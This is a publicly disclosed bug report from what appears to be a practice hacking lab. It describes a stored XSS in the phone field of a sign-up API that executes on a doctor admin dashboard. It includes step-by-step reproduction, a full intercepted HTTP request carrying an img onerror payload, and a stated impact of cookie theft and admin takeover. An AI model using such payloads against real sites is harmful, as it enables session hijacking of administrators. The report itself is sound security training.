Store xss on doctor admin dashboard

FirstBlood-#1010 — Store xss on doctor admin dashboard
This issue was discovered on FirstBlood v3

This report has been reviewed and accepted as a valid vulnerability on FirstBlood!

On 2022-12-08, properlay Level 7 reported:


Hello, I found a store XSS vulnerability on doctor admin panel.
To reproduce:


Visit https://7b0a93c7239c-properlay.a.firstbloodhackers.com/hackerback.html.


When sign up the HackerBack event, Burp suite intercept ON


Fill full name and phone number and click sing up


On the intercept request, Change the parameter phone value to phone=1<img+src=x+onerror=alert(0)>


POST /api/hackerback.php HTTP/1.1
Host: 7b0a93c7239c-properlay.a.firstbloodhackers.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: https://7b0a93c7239c-properlay.a.firstbloodhackers.com
Referer: https://7b0a93c7239c-properlay.a.firstbloodhackers.com/hackerback.html
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

full_name=test&phone=1<img+src=x+onerror=alert(0)>&submit=Signup


Forward the request. The XSS will execute on admin dashboard.

Impact:
Can takeover doctor admin account by stealing cookie.

This report has been publicly disclosed for everyone to view

P1 CRITICAL

FirstBlood ID: 59
Vulnerability Type: Stored XSS

It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.

Report Feedback

@zseano

Creator & Administrator

Congratulations, you were the first user to discover this finding, great job!

BugBountyHunter

Report Feedback

@zseano